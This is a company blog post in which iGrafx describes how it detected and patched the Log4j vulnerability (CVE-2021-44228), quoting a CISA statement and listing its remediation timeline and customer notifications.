iGrafx Thwarts Log4j Vulnerability

sEarly detection and remediation of the recent Log4j vulnerability by security teams helps to protect BPM customers from loss.

A report from NTT Application Security found that businesses and agencies spend about 250 days to remediate high-severity risks. At iGrafx we know how essential secure systems are to our business process management (BPM) customers. By taking a proactive approach, the iGrafx team identified and mitigated the recent Log4j vulnerability. This move protects business customers from significant losses.

Identifying the Log4j Vulnerability

On December 11, the US Cybersecurity and Infrastructure Security Agency (CISA) released a statement. They spoke about the dangers of the Log4j vulnerability.

“CISA is working closely with our partners to address a critical vulnerability containing the log4j software,” stated CISA Director, Jen Easterly. “This vulnerability is being widely exploited by a growing set of threat actors, presents an urgent challenge to network defenders given its broad use. End users will be reliant on their vendors, and the vendor community must immediately identify, mitigate, and patch the wide array of products using this software. Vendors should also be communicating with their customers to ensure end users know that their product contains this vulnerability and should prioritize software updates.”

Vulnerability CVE-2021-44228 exploits the use of a common third-party enterprise endpoint feature LDAP (and other JNDI related endpoints). If an attacker controls log messaging, that individual or organization could execute malicious code from the LDAP servers.

Any feature that is exploited and executes malicious code to a server could cause harm. This is why this was a zero-day bug and considered a 10 on the critical level (based on 1-10 levels).

Recognition and Remediation

At iGrafx, we actively monitor vulnerability exploits through various means. In this case, the team was aware of it early on Friday morning, December 10. Our cross-functional global team coordinated to resolve the vulnerability over the weekend to ensure limited exposure. Working in round-the-clock shifts, the organization committed to making sure that customer data was safe.

We can now confirm that:

• Within 12 hours we fixed and deployed the new release to our cloud customers that approved updates of this type
• Within 48 hours we fixed and deployed the release to our datacenter customers
• All customers were contacted and informed of the vulnerability, as well as the steps iGrafx took to remediate it

Going Forward

We continue to analyze the logs of our cloud services to identify any attempts to leverage the exploit. We have not found any attempts to date. For more information about iGrafx BPM solutions, security, or the Log4j vulnerability, please contact us.